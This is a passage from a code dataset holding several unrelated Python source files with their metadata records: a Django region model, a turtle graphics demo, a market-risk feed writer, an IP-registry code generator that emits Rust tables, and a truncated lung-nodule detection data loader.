img)\r\n","sub_path":"keras/개인프로젝트/ChatBot/AI/EDItH_sub_pack.py","file_name":"EDItH_sub_pack.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"571652829","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\n\nRUSSIAN_TZ = (\n ('Europe/Kaliningrad', _('Kaliningrad Time (MSK-1)')),\n ('Europe/Moscow', _('Moscow Time (MSK)')),\n ('Asia/Yekaterinburg', _('Yekaterinburg Time (MSK+2)')),\n ('Asia/Omsk', _('Omsk Time (MSK+3)')),\n ('Asia/Krasnoyarsk', _('Krasnoyarsk Time (MSK+4)')),\n ('Asia/Irkutsk', _('Irkutsk Time (MSK+5)')),\n ('Asia/Yakutsk', _('Yakutsk Time (MSK+6)')),\n ('Asia/Vladivostok', _('Vladivostok Time (MSK+7)')),\n ('Asia/Magadan', _('Magadan Time (MSK+8)')),\n)\n\n\nclass Region(models.Model):\n code = models.SmallIntegerField(_('code'), unique=True)\n abbr = models.CharField(_('abbreviation'), max_length=6, unique=True)\n tz = models.CharField(_('time zone'), max_length=20, choices=RUSSIAN_TZ)\n name = models.CharField(_('name'), max_length=255, unique=True)\n g_name = models.CharField(_('genitive name'), max_length=255,\n blank=True, null=True)\n\n class Meta:\n db_table = 'cms_region'\n ordering = ['code']\n verbose_name = _('region')\n verbose_name_plural = _('regions')\n permissions = (\n ('manage_content', _('can manage content of region')),\n )\n\n def __unicode__(self):\n return self.name\n\n\nclass RegionDepended(models.Model):\n region = models.ForeignKey('Region')\n\n class Meta:\n abstract = True\n","sub_path":"cms/regions/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"5344860","text":"import turtle as t\n\nc=[\"red\",\"blue\",\"gray\",\"green\",\"pink\",\"black\",\"white\",\"sky blue\",\"orange\"]\n\nt.speed(10)\nfor i in range(8,-1,-1):\n t.fillcolor(c[i])\n t.begin_fill()\n t.circle(i*15)\n t.end_fill()\n\nt.filling()\n","sub_path":"turtle/graphics multi color filling2.py","file_name":"graphics multi color filling2.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"95713563","text":"'''\nPurpose :Market Risk feed files\nDepartment and Desk :IT\nRequester: :Natalie Austin\nDeveloper :Douglas Finkel / Henk Nel\nCR Number :264536\n\n'''\n\nimport ael, string, acm, MR_MainFunctions\n\nInsL = []\n\n# OPENFILE ##########################################################################################################\ndef OpenFile(temp,FileDir,Filename,PositionName,*rest):\n\n filename = FileDir + Filename\n outfile = open(filename, 'w')\n outfile.close()\n\n del InsL[:]\n InsL[:] = []\n \n return filename\n\n# OPENFILE ##########################################################################################################\n\n\n\n# WRITE - FILE ######################################################################################################\ndef Write(l,FileDir,Filename,PositionName,*rest):\n \n filename = FileDir + Filename\n \n ins = acm.FInstrument[l.insaddr.insaddr]\n inscurve = acm.FInstrument[l.float_rate.insaddr]\n# trade = acm.FTrade[t.trdnbr]\n context = acm.GetDefaultContext()\n \n if getattr(l, 'reset_type') not in ('Single'):\n LegList = 'CI_' + str(l.float_rate.insid) + '_'+ str(getattr(l, 'reset_period.count')) + str(getattr(l, 'reset_period.unit'))\n else: \n LegList = 'CI_' + str(l.float_rate.insid) + '_Maturity'\n \n if (LegList) not in InsL:\n InsL.append(LegList)\n \n outfile = open(filename, 'a')\n\t#Base record\n \n BAS = 'BAS'\n Volatility = 'Curve Index'\n OBJECT = 'Curve IndexSPEC'\n TYPE = 'Curve Index'\n \n if getattr(l, 'reset_type') not in ('Single'):\n IDENTIFIER = 'CI_' + str(l.float_rate.insid) + '_'+ str(getattr(l, 'reset_period.count')) + str(getattr(l, 'reset_period.unit'))\n else: \n IDENTIFIER = 'CI_' + str(l.float_rate.insid) + '_Maturity'\n if getattr(l, 'reset_type') not in ('Single'):\n NAME = ('CI_' + str(l.float_rate.insid) + '_'+ str(getattr(l, 'reset_period.count')) + str(getattr(l, 'reset_period.unit')))[0:50]\n else: \n NAME = ('CI_' + str(l.float_rate.insid) + '_Maturity')[0:50]\n\n try:\n DiscountCurveXREF = inscurve.MappedDiscountLink().Value().Link().YieldCurveComponent().Curve().Name()\n except:\n DiscountCurveXREF = inscurve.MappedDiscountLink().Value().Link().YieldCurveComponent().Name()\n \n HistoricalCrvXREF = str(l.float_rate.insid)+'_HistoricalCurve'\n RuleAtEndBUSD = '0'\n RuleAtEndCAL = ''\n RuleAtEndCONV = 'Regular'\n RuleAtEndRULE = 'Following'\n RuleAtStartBUSD = '0'\n RuleAtStartCAL = ''\n RuleAtStartCONV = 'Regular'\n RuleAtStartRULE = 'Preceding'\n\n if str(getattr(l, 'reset_period.count'))+str(getattr(l, 'reset_period.unit')) == '0Days':\n TermNB = ''\n elif getattr(l, 'reset_type') not in 'Single':\n TermNB = ''\n else:\n TermNB = str(getattr(l, 'reset_period.count'))\n\n if str(getattr(l, 'reset_period.count'))+str(getattr(l, 'reset_period.unit')) == '0Days': \n TermUNIT = 'Maturity'\n elif getattr(l, 'reset_type') not in 'Single':\n TermUNIT = 'Maturity'\n else:\n TermUNIT = str(getattr(l, 'reset_period.unit'))\n UnitCAL = ''\n \n # Get the daycount methd off the instruments leg\n for InsLegs in ael.Instrument[l.float_rate.insid].legs():\n UnitDAYC = MR_MainFunctions.DayCountFix(InsLegs.daycount_method)\n \n UnitPERD = 'simple'\n UnitUNIT = '%'\n # To set ZeroFloor default to 'False'\n ZeroFloorFLAG = 'False'\n\n outfile.write('%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\\n'% \n (BAS, Volatility, OBJECT, \n TYPE, IDENTIFIER, NAME, \n DiscountCurveXREF, HistoricalCrvXREF, \n RuleAtEndBUSD, RuleAtEndCAL, RuleAtEndCONV, \n RuleAtEndRULE, RuleAtStartBUSD, RuleAtStartCAL, \n RuleAtStartCONV, RuleAtStartRULE, TermNB, TermUNIT, \n UnitCAL, UnitDAYC, UnitPERD, UnitUNIT, ZeroFloorFLAG))\n\n outfile.close()\n\n return l.insaddr.insid\n \n# WRITE - FILE ######################################################################################################\n\n","sub_path":"Python modules/MR_Curve_Index.py","file_name":"MR_Curve_Index.py","file_ext":"py","file_size_in_byte":5221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"300253703","text":"#!/usr/bin/env python3\n# coding: utf8\n\nimport os, sys, time\nimport signal, logging, json\n\n\nlogger = logging.getLogger('codegen')\n\ndatadir = os.path.join(os.getcwd(), \"data\")\n# registries = ('afrinic', 'apnic', 'arin', 'iana', 'ietf', 'lacnic', 'ripencc')\nregistries = ('iana', 'afrinic', 'apnic', 'arin', 'ietf', 'lacnic', 'ripencc')\n\nCOUNTRY_CODES = json.loads(open(\"data/country_codes.json\", \"rb\").read().decode(\"UTF-8\"))\n\n\n\"\"\"\nIANA\n\n---------- ---------------------------------------------\nRegistry Area Covered\n---------- ---------------------------------------------\nAFRINIC Africa Region\nAPNIC Asia/Pacific Region\nARIN Canada, USA, and some Caribbean Islands\nLACNIC Latin America and some Caribbean Islands\nRIPE NCC Europe, the Middle East, and Central Asia\n---------- ---------------------------------------------\n\"\"\"\n\nipv4_prefixs = (0,\n 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,\n 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32\n)\n\nipv6_prefixs = (0, \n 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,\n 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, \n 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, \n 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, \n 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, \n 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, \n 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112,\n 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128\n)\n\ndef ipv4_to_u64(s):\n array = list(map(lambda sn: int(sn), s.split(\".\")))\n assert(len(array) == 4)\n for x in array:\n assert(x >= 0 and x <= 255)\n n = ( (array[0] & 0xff) << 24) \\\n + ( (array[1] & 0xff) << 16) \\\n + ( (array[2] & 0xff) << 8) \\\n + ( (array[3] & 0xff) << 0)\n return n\n\ndef ipv6_to_u128(s):\n # WARN: 暂不支持 连缀符号`.`\n assert(\".\" not in s)\n s = s.replace(\"::\", \"...\")\n assert(s.count(\"...\") <= 1)\n if s.count(\":\") != 7 and \"...\" in s:\n if s.startswith(\"...\"):\n s = s.replace(\"...\", \":\".join(list(\"0\"*(7-s.count(\":\")))) + \":\")\n elif s.endswith(\"...\"):\n s = s.replace(\"...\", \":\" + \":\".join(list(\"0\"*(7-s.count(\":\")))))\n else:\n s = s.replace(\"...\", \":\" + \":\".join(list(\"0\"*(6-s.count(\":\")))) + \":\")\n tmp = s.split(\":\")\n assert(len(tmp) == 8)\n bits = \"\".join(list(map(lambda sn: bin(int(sn, 16)).replace(\"0b\", \"\").rjust(16, \"0\"), tmp)))\n assert(len(bits) == 128)\n array = []\n pos = 0\n while 1:\n _bits = bits[pos: pos+8]\n if len(_bits) != 8:\n break\n array.append(int(_bits, 2))\n pos += 8\n _bits = None\n pos = None\n assert(len(array) == 16)\n for x in array:\n assert(x >= 0 and x <= 255)\n n = ( (array[ 0] & 0xff) << 120) \\\n + ( (array[ 1] & 0xff) << 112) \\\n + ( (array[ 2] & 0xff) << 104) \\\n + ( (array[ 3] & 0xff) << 96) \\\n + ( (array[ 4] & 0xff) << 88) \\\n + ( (array[ 5] & 0xff) << 80) \\\n + ( (array[ 6] & 0xff) << 72) \\\n + ( (array[ 7] & 0xff) << 64) \\\n + ( (array[ 8] & 0xff) << 56) \\\n + ( (array[ 9] & 0xff) << 48) \\\n + ( (array[10] & 0xff) << 40) \\\n + ( (array[11] & 0xff) << 32) \\\n + ( (array[12] & 0xff) << 24) \\\n + ( (array[13] & 0xff) << 16) \\\n + ( (array[14] & 0xff) << 8) \\\n + ( (array[15] & 0xff) << 0) \n return n\n\ndef u64_to_ipv4(n):\n assert(n >= 0 and n <= 4294967295)\n array = (\n ((n >> 24) & 0xff),\n ((n >> 16) & 0xff), \n ((n >> 8) & 0xff),\n ((n >> 0) & 0xff)\n )\n str_array = list(map(lambda n: str(n), array))\n return \".\".join(str_array)\n\ndef u128_to_ipv6(n):\n assert(n >= 0 and n <= 340282366920938463463374607431768211455)\n bits = bin(n).replace(\"0b\", \"\").rjust(128, \"0\")\n assert(len(bits) == 128)\n\n array = []\n pos = 0\n while 1:\n _bits = bits[pos: pos+16]\n if len(_bits) != 16:\n break\n array.append(hex(int(_bits, 2)).replace(\"0x\", \"\").rjust(4, \"0\") )\n pos += 16\n _bits = None\n pos = None\n assert(len(array) == 8)\n\n return \":\".join(array)\n\n\ndef ipv4_range_block(ipv4_addr, count=None, prefix=None):\n start = ipv4_to_u64(ipv4_addr)\n\n if type(count) == int:\n end = start+count\n assert(end <= 4294967295)\n return (start, start+count)\n\n if type(prefix) == int and prefix in ipv4_prefixs:\n end = max(start+2**(32-prefix) -1, 0)\n assert(end <= 4294967295)\n return (start, end)\n\n raise ValueError('Ooops ...')\n\n\ndef ipv6_range_block(ipv6_addr, count=None, prefix=None):\n start = ipv6_to_u128(ipv6_addr)\n if type(count) == int:\n end = start+count\n assert(end <= 340282366920938463463374607431768211455)\n return (start, end)\n \n if type(prefix) == int and prefix in ipv6_prefixs:\n end = max(start+2**(128-prefix) -1, 0)\n assert(end <= 340282366920938463463374607431768211455)\n return (start, end)\n\n raise ValueError('Ooops ...')\n\ndef ip_cidr(start_ip, end_ip):\n if \".\" in start_ip and \".\" in end_ip:\n # IPv4\n start_number = ipv4_to_u64(start_ip)\n end_number = ipv4_to_u64(end_ip)\n if start_number == end_number:\n return \"%s/%d\" % (start_ip, 32)\n elif start_number < end_number:\n return \"%s/%s\" % (start_ip, 32-len(bin(end_number - start_number).replace(\"0b\", \"\")))\n elif start_number > end_number:\n raise ValueError('Ooops ...')\n else:\n raise ValueError('Ooops ...')\n elif \":\" in end_ip :\n # IPv6\n start_number = ipv6_to_u128(start_ip)\n end_number = ipv6_to_u128(end_ip)\n if start_number == end_number:\n return \"%s/%d\" % (start_ip, 128)\n elif start_number < end_number:\n return \"%s/%s\" % (start_ip, 128-len(bin(end_number - start_number).replace(\"0b\", \"\")))\n elif start_number > end_number:\n raise ValueError('Ooops ...')\n else:\n raise ValueError('Ooops ...')\n else:\n raise ValueError('Ooops ...')\n\ndef ip_classful(s):\n # https://en.wikipedia.org/wiki/Classful_network#Classful_addressing_definition\n if \".\" in s:\n # IPv4\n number = ipv4_to_u64(s)\n bits = bin(number).replace(\"0b\", \"\").rjust(32, \"0\")\n if number >= 0b11110000000000000000000000000000 and number <= 0b11111111111111111111111111111111:\n # 240.0.0.0 - 255.255.255.255\n return \"E\"\n elif bits.startswith(\"1110\"):\n # 224.0.0.0 - 239.255.255.255\n return \"D\"\n elif bits.startswith(\"110\"):\n # 192.0.0.0 - 223.255.255.255\n return \"C\"\n elif bits.startswith(\"10\"):\n # 128.0.0.0 - 191.255.255.255\n return \"B\"\n elif bits.startswith(\"0\"):\n # 0.0.0.0 - 127.255.255.255\n return \"A\"\n else:\n raise ValueError('Ooops ...')\n else:\n # IPv6\n return \"N/A\"\n\ndef ip_subnet_mask(s):\n classful = ip_classful(s)\n if classful == 'A':\n return ipv4_to_u64(\"255.0.0.0\")\n elif classful == 'B':\n return ipv4_to_u64(\"255.255.0.0\")\n elif classful == 'C':\n return ipv4_to_u64(\"255.255.255.0\")\n elif classful == 'D':\n raise ValueError(\"not defined\")\n elif classful == 'E':\n raise ValueError(\"not defined\")\n elif classful == 'N/A':\n # IPv6\n # a:b:c:d:e:f:g:h\n # Network address: 00 - 48 bits (a, b, c)\n # Subnet address : 48 - 64 bits (d, )\n # Device address : 64 - 128 bits (e, f, g, h)\n return \"ffff:ffff:ffff:ffff::\"\n else:\n raise ValueError(\"Ooops ...\")\n\n\ndef gen_asn_code():\n pass\n\ndef gen_ip_code(registry_name, ip_version, country, records):\n data = []\n counts = {}\n ext_data = {}\n\n for (registry, cc, _type, start, value, date, status, extensions) in records:\n # ('ripencc', 'ZZ', 'ipv6', '2a0d:d080::', 25, '', 'available', ())\n if registry_name == 'iana':\n _c = status\n else:\n _c = cc\n\n if registry == registry_name and _type == ip_version and country == _c:\n if ip_version == \"ipv4\":\n value = value - 1\n start_ipv4_u64 = ipv4_to_u64(start)\n if start_ipv4_u64 in data:\n if counts[start_ipv4_u64] != value:\n raise ValueError(\"Ooops ...\")\n else:\n data.append(start_ipv4_u64)\n counts[start_ipv4_u64] = value\n ext_data[start_ipv4_u64] = (cc, status)\n elif registry == registry_name and ip_version == \"ipv6\" and country == _c:\n try:\n start_ipv6_u128, end_ipv6_u128 = ipv6_range_block(start, prefix=value)\n except Exception as e:\n logger.error(registry, cc, _type, start, value, date, status, extensions)\n raise e\n end_ipv6_nums = end_ipv6_u128 - start_ipv6_u128\n\n if start_ipv6_u128 in data:\n if counts[start_ipv6_u128] != end_ipv6_nums:\n raise ValueError(\"Ooops ...\")\n else:\n data.append(start_ipv6_u128)\n counts[start_ipv6_u128] = end_ipv6_nums\n ext_data[start_ipv6_u128] = (cc, status)\n\n data.sort()\n while 1:\n num = 0\n idx = 0\n while idx < len(data) - 1:\n if data[idx] + counts[data[idx]] == data[idx+1]:\n counts[data[idx]] += counts[data[idx+1]]\n data.remove(data[idx+1])\n num += 1\n idx += 1\n if num == 0:\n break\n \n res = []\n for ip_number in data:\n ip_nums = counts[ip_number]\n cc, status = ext_data[ip_number]\n end_ip = ip_number + ip_nums\n if ip_version == \"ipv4\":\n assert(end_ip <= 4294967295)\n elif ip_version == \"ipv6\":\n assert(end_ip <= 340282366920938463463374607431768211455)\n res.append((registry_name, COUNTRY_CODES.index(cc), ip_number, end_ip, status))\n\n return res\n\n\ndef get_china_ipv4_list():\n pass\n\ndef codegen():\n pass\n\n\ndef test():\n # print(ip_cidr(\"0.0.0.1\"))\n # print(ipv4_to_u64(\"0.0.0.0\"))\n print(ip_cidr(\"61.5.208.0\", \"61.5.208.0\"))\n print(ip_cidr(\"61.5.208.0\", \"61.5.223.255\"))\n print(ip_cidr(\"103.43.155.0\", \"103.43.155.255\"))\n\n print(ip_cidr(\"2001:268:2000::\", \"2001:268:3fff:ffff:ffff:ffff:ffff:ffff\"))\n\n print(ip_classful(\"61.5.208.0\"))\n print(ip_classful(\"103.43.157.100\"))\n print(ip_classful(\"255.255.255.255\"))\n\n return\n start, end = ipv4_range_block(\"103.43.156.0\", prefix=26)\n print(end-start, u64_to_ipv4(start), u64_to_ipv4(end))\n # print(ipaddress.IPv4Network(\"103.43.156.0/22\").num_addresses)\n\n start, end = ipv6_range_block(\"2001:268:2000::\", prefix=35)\n print(end-start, u128_to_ipv6(start), u128_to_ipv6(end))\n # print(ipaddress.IPv6Network(\"2001:268:2000::/35\").num_addresses)\n\n # return\n print(ipv6_to_u128( \"2001:268:2000::\" ))\n print(ipv6_to_u128( \"2001:268:2000::2:3\" ))\n print(ipv6_to_u128( \"::2001:268:2000\" ))\n\n # print(ipv6_to_u128( str(ipaddress.IPv6Address(\"2001:268:2000::\").exploded) ))\n # print(ipaddress.IPv6Address(42540536976427471861665356247566647296).exploded)\n print(u128_to_ipv6(42540536976427471861665356247566647296))\n\n\ndef main():\n records = json.loads(open(\"data/records.json\", \"rb\").read().decode(\"UTF-8\"))\n # registries = ('afrinic', 'apnic', 'arin', 'iana', 'ietf', 'lacnic', 'ripencc')\n # (registry, country_code, ip_number, ip_nums, status)\n status_set = [\"afrinic\", \"allocated\", \"apnic\", \"arin\", \"assigned\", \"available\", \"iana\", \"ietf\", \"lacnic\", \"reserved\", \"ripencc\"]\n\n _registries = registries\n for registry in _registries:\n logger.info(\"Handle registry %s ...\", registry)\n if registry == \"ietf\":\n continue\n\n path = \"src/number/db/%s.rs\" % registry\n mod_path = \"src/number/db/mod.rs\"\n\n open(path, \"wb\").write(b\"\")\n\n data_v4 = []\n data_v6 = []\n ccodes = COUNTRY_CODES\n if registry == \"iana\":\n ccodes = ('afrinic', 'apnic', 'arin', 'ietf', 'lacnic', 'ripencc')\n for ccode in ccodes:\n data_v4.extend(gen_ip_code(registry, \"ipv4\", ccode, records))\n data_v6.extend(gen_ip_code(registry, \"ipv6\", ccode, records))\n \n v4_values = {}\n for x in data_v4:\n v4_values[x[2]] = (x[3], x[1], status_set.index(x[4]) )\n v6_values = {}\n for x in data_v6:\n v6_values[x[2]] = (x[3], x[1], status_set.index(x[4]) )\n\n data_v4 = list(map(lambda n: (n, v4_values[n][0], v4_values[n][1], v4_values[n][2] ), sorted(list(map(lambda r: r[2], data_v4)))))\n data_v6 = list(map(lambda n: (n, v6_values[n][0], v6_values[n][1], v6_values[n][2] ), sorted(list(map(lambda r: r[2], data_v6)))))\n v4_values = None\n v6_values = None\n\n data_len = len(data_v4)\n\n rust_code = \"#[feature(i128_type)]\\n\\n\"\n rust_code += \"pub static IPV4_NUMBERS: [(u32, u32, u8, u8); %d] = [\\n \" % (len(data_v4), )\n idx = 0\n for x in data_v4:\n idx += 1\n if idx % 6 == 0:\n rust_code += \"\\n \"\n\n rust_code += \"(%d, %d, %d, %d), \" % (x[0], x[1], x[2], x[3])\n rust_code += \"\\n];\\n\\n\"\n\n rust_code += \"pub static IPV6_NUMBERS: [(u128, u128, u8, u8); %d] = [\\n \" % ( len(data_v6), )\n idx = 0\n for x in data_v6:\n idx += 1\n if idx % 4 == 0:\n rust_code += \"\\n \"\n\n rust_code += \"(%d, %d, %d, %d), \" % (x[0], x[1], x[2], x[3])\n rust_code += \"\\n];\\n\"\n\n open(path, \"ab\").write(rust_code.encode(\"UTF-8\"))\n \n rust_mod_code = \"\\n\\n\"\n for x in _registries:\n if x != \"ietf\":\n rust_mod_code += \"pub mod %s;\\n\" % x\n\n open(mod_path, \"wb\").write(rust_mod_code.encode(\"UTF-8\"))\n \n\nif __name__ == '__main__':\n logging.basicConfig(\n format = 'PID %(process)d %(asctime)s \\x1b[32m%(levelname)-7s\\x1b[0m %(threadName)-14s %(name)-15s %(message)s',\n datefmt = '%Y-%m-%d %H:%M:%S',\n level = logging.DEBUG\n )\n\n logging.getLogger(\"chardet.charsetprober\").setLevel(logging.CRITICAL)\n logging.getLogger(\"chardet.universaldetector\").setLevel(logging.CRITICAL)\n\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n signal.signal(signal.SIGSEGV, signal.SIG_DFL)\n signal.signal(signal.SIGCHLD, signal.SIG_IGN)\n\n main()","sub_path":"iana/scripts/ipdb_codegen.py","file_name":"ipdb_codegen.py","file_ext":"py","file_size_in_byte":14966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"85582574","text":"import numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nimport os\nimport time\nimport collections\nimport random\nfrom layers import iou\nfrom scipy.ndimage import zoom\nimport warnings\nfrom scipy.ndimage.interpolation import rotate\n\nclass DataBowl3Detector(Dataset):\n def __init__(self, data_dir, split_path, config, phase = 'train',split_comber=None):\n assert(phase == 'train' or phase == 'val' or phase == 'test')\n self.phase = phase\n self.max_stride = config['max_stride'] \n self.stride = config['stride'] \n sizelim = config['sizelim']/config['reso']\n sizelim2 = config['sizelim2']/config['reso']\n sizelim3 = config['sizelim3']/config['reso']\n self.blacklist = config['blacklist']\n self.isScale = config['aug_scale']\n self.r_rand = config['r_rand_crop']\n self.augtype = config['augtype']\n self.pad_value = config['pad_value']\n self.split_comber = split_comber\n idcs = np.load(split_path)\n if phase!='test':\n idcs = [f for f in idcs if (f not in self.blacklist)]\n\n self.filenames = [os.path.join(data_dir, '%s_clean.npy' % idx) for idx in idcs]\n self.kagglenames = [f for f in self.filenames if len(f.split('/')[-1].split('_')[0])>20]\n self.lunanames = [f for f in self.filenames if len(f.split('/')[-1].split('_')[0])<20]\n \n labels = []\n \n for idx in idcs:\n l = np.load(os.path.join(data_dir, '%s_label.npy' %idx))\n if np.all(l==0):\n l=np.array([])\n labels.append(l)\n\n self.sample_bboxes = labels\n if self.phase != 'test':\n self.bboxes = []\n for i, l in enumerate(labels):\n if len(l) > 0 :\n for t in l:\n if t[3]>sizelim:\n self.bboxes.append([np.concatenate([[i],t])])\n if t[3]>sizelim2:\n self.bboxes+=[[np.concatenate([[i],t])]]*2\n if t[3]>sizelim3:\n self.bboxes+=[[np.concatenate([[i],t])]]*4\n self.bboxes = np.concatenate(self.bboxes,axis = 0)\n\n self.crop = Crop(config)\n self.label_mapping = LabelMapping(config, self.phase)\n\n def __getitem__(self, idx,split=None):\n t = time.time()\n np.random.seed(int(str(t%1)[2:7]))#seed according to time\n\n isRandomImg = False\n if self.phase !='test':\n if idx>=len(self.bboxes):\n isRandom = True\n idx = idx%len(self.bboxes)\n isRandomImg = np.random.randint(2)\n else:\n isRandom = False\n else:\n isRandom = False\n \n if self.phase != 'test':\n if not isRandomImg:\n bbox = self.bboxes[idx]\n filename = self.filenames[int(bbox[0])]\n imgs = np.load(filename)\n bboxes = self.sample_bboxes[int(bbox[0])]\n isScale = self.augtype['scale'] and (self.phase=='train')\n sample, target, bboxes, coord = self.crop(imgs, bbox[1:], bboxes,isScale,isRandom)\n if self.phase=='train' and not isRandom:\n sample, target, bboxes, coord = augment(sample, target, bboxes, coord,\n ifflip = self.augtype['flip'], ifrotate=self.augtype['rotate'], ifswap = self.augtype['swap'])\n else:\n randimid = np.random.randint(len(self.kagglenames))\n filename = self.kagglenames[randimid]\n imgs = np.load(filename)\n bboxes = self.sample_bboxes[randimid]\n isScale = self.augtype['scale'] and (self.phase=='train')\n sample, target, bboxes, coord = self.crop(imgs, [], bboxes,isScale=False,isRand=True)\n label = self.label_mapping(sample.shape[1:], target, bboxes)\n sample = (sample.astype(np.float32)-128)/128\n #if filename in self.kagglenames and self.phase=='train':\n # label[label==-1]=0\n return torch.from_numpy(sample), torch.from_numpy(label), coord\n else:\n imgs = np.load(self.filenames[idx])\n bboxes = self.sample_bboxes[idx]\n nz, nh, nw = imgs.shape[1:]\n pz = int(np.ceil(float(nz) / self.stride)) * self.stride\n ph = int(np.ceil(float(nh) / self.stride)) * self.stride\n pw = int(np.ceil(float(nw) / self.stride)) * self.stride\n imgs = np.pad(imgs, [[0,0],[0, pz - nz], [0, ph - nh], [0, pw - nw]], 'constant',constant_values = self.pad_value)\n \n xx,yy,zz = np.meshgrid(np.linspace(-0.5,0.5,imgs.shape[1]/self.stride),\n np.linspace(-0.5,0.5,imgs.shape[2]/self.stride),\n np.linspace(-0.5,0.5,imgs.shape[3]/self.stride),indexing ='ij')\n coord = np.concatenate([xx[np.newaxis,...], yy[np.newaxis,...],zz[np.newaxis,:]],0).astype('float32')\n imgs, nzhw = self.split_comber.split(imgs)\n coord2, nzhw2 = self.split_comber.split(coord,\n side_len = self.split_comber.side_len/self.stride,\n max_stride = self.split_comber.max_stride/self.stride,\n margin = self.split_comber.margin/self.stride)\n assert np.all(nzhw==nzhw2)\n imgs = (imgs.astype(np.float32)-128)/128\n return torch.from_numpy(imgs), bboxes, torch.from_numpy(coord2), np.array(nzhw)\n\n def __len__(self):\n if self.phase == 'train':\n return len(self.bboxes)/(1-self.r_rand)\n elif self.phase =='val':\n return len(self.bboxes)\n else:\n return len(self.sample_bboxes)\n \n \ndef augment(sample, target, bboxes, coord, ifflip = True, ifrotate=True, ifswap = True):\n # angle1 = np.random.rand()*180\n if ifrotate:\n validrot = False\n counter = 0\n while not validrot:\n newtarget = np.copy(target)\n angle1 = np.random.rand()*180\n size = np.array(sample.shape[2:4]).astype('float')\n rotmat = np.array([[np.cos(angle1/180*np.pi),-np.sin(angle1/180*np.pi)],[np.sin(angle1/180*np.pi),np.cos(angle1/180*np.pi)]])\n newtarget[1:3] = np.dot(rotmat,target[1:3]-size/2)+size/2\n if np.all(newtarget[:3]>target[3]) and np.all(newtarget[:3]< np.array(sample.shape[1:4])-newtarget[3]):\n validrot = True\n target = newtarget\n sample = rotate(sample,angle1,axes=(2,3),reshape=False)\n coord = rotate(coord,angle1,axes=(2,3),reshape=False)\n for box in bboxes:\n box[1:3] = np.dot(rotmat,box[1:3]-size/2)+size/2\n else:\n counter += 1\n if counter ==3:\n break\n if ifswap:\n if sample.shape[1]==sample.shape[2] and sample.shape[1]==sample.shape[3]:\n axisorder = np.random.permutation(3)\n sample = np.transpose(sample,np.concatenate([[0],axisorder+1]))\n coord = np.transpose(coord,np.concatenate([[0],axisorder+1]))\n target[:3] = target[:3][axisorder]\n bboxes[:,:3] = bboxes[:,:3][:,axisorder]\n \n if ifflip:\n# flipid = np.array([np.random.randint(2),np.random.randint(2),np.random.randint(2)])*2-1\n flipid = np.array([1,np.random.randint(2),np.random.randint(2)])*2-1\n sample = np.ascontiguousarray(sample[:,::flipid[0],::flipid[1],::flipid[2]])\n coord = np.ascontiguousarray(coord[:,::flipid[0],::flipid[1],::flipid[2]])\n for ax in range(3):\n if flipid[ax]==-1:\n target[ax] = np.array(sample.shape[ax+1])-target[ax]\n bboxes[:,ax]= np.array(sample.shape[ax+1])-bboxes[:,ax]\n return sample, target, bboxes, coord \n\nclass Crop(object):\n def __init__(self, config):\n self.crop_size = config['crop_size']\n self.bound_size = config['bound_size']\n self.stride = config['stride']\n self.pad_value = config['pad_value']\n def __call__(self, imgs, target, bboxes,isScale=False,isRand=False):\n if isScale:\n radiusLim = [8.,120.]\n scaleLim = [0.75,1.25]\n scaleRange = [np.min([np.max([(radiusLim[0]/target[3]),scaleLim[0]]),1])\n ,np.max([np.min([(radiusLim[1]/target[3]),scaleLim[1]]),1])]\n scale = np.random.rand()*(scaleRange[1]-scaleRange[0])+scaleRange[0]\n crop_size = (np.array(self.crop_size).astype('float')/scale).astype('int')\n else:\n crop_size=self.crop_size\n bound_size = self.bound_size\n target = np.copy(target)\n bboxes = np.copy(bboxes)\n \n start = []\n for i in range(3):\n if not isRand:\n r = target[3] / 2\n s = np.floor(target[i] - r)+ 1 - bound_size\n e = np.ceil (target[i] + r)+ 1 + bound_size - crop_size[i] \n else:\n s = np.max([imgs.shape[i+1]-crop_size[i]/2,imgs.shape[i+1]/2+bound_size])\n e = np.min([crop_size[i]/2, imgs.shape[i+1]/2-bound_size])\n target = np.array([np.nan,np.nan,np.nan,np.nan])\n if s>e:\n start.append(np.random.randint(e,s))#!\n else:\n start.append(int(target[i])-crop_size[i]/2+np.random.randint(-bound_size/2,bound_size/2))\n \n \n normstart = np.array(start).astype('float32')/np.array(imgs.shape[1:])-0.5\n normsize = np.array(crop_size).astype('float32')/np.array(imgs.shape[1:])\n xx,yy,zz = np.meshgrid(np.linspace(normstart[0],normstart[0]+normsize[0],self.crop_size[0]/self.stride),\n np.linspace(normstart[1],normstart[1]+normsize[1],self.crop_size[1]/self.stride),\n np.linspace(normstart[2],normstart[2]+normsize[2],self.crop_size[2]/self.stride),indexing ='ij')\n coord = np.concatenate([xx[np.newaxis,...], yy[np.newaxis,...],zz[np.newaxis,:]],0).astype('float32')\n\n pad = []\n pad.append([0,0])\n for i in 